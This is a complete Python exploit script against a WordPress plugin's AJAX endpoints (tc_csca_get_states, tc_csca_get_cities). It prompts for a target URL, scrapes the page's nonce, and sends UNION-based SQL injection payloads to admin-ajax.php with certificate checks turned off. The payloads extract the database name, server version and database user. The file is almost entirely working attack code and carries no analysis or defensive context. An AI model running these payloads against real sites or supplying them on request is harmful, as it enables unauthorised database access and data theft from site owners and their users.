import requests as req
import re
import json
from urllib3.exceptions import InsecureRequestWarning
req.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def extract(text):
	for info in json.loads(text):
	    if info['id'].startswith("database"):
	       print(info['id'])
	       break

def exploit(url,nonce):
	payloads = [
	 {"action":"tc_csca_get_states","nonce_ajax":nonce,"cnt":"1 or 0 union select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3-- -"}
	,{"action":"tc_csca_get_cities","nonce_ajax":nonce,"sid":"1 or 0 union select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3-- -"}
	]
	for payload in payloads:
		print("Exploit with action: "+payload['action'])
		resp = req.post(url+"/wp-admin/admin-ajax.php", data=payload,verify=False)
		extract(resp.text)
	
	

url = input("Url(http://example.com): ")
regex_nonce = 'tc_csca_auto_ajax = {"ajax_url":".*","nonce":"(.*)"}'
nonce = re.search(regex_nonce, req.get(url,verify=False).text)
nonce= nonce.group(1)
exploit(url,nonce)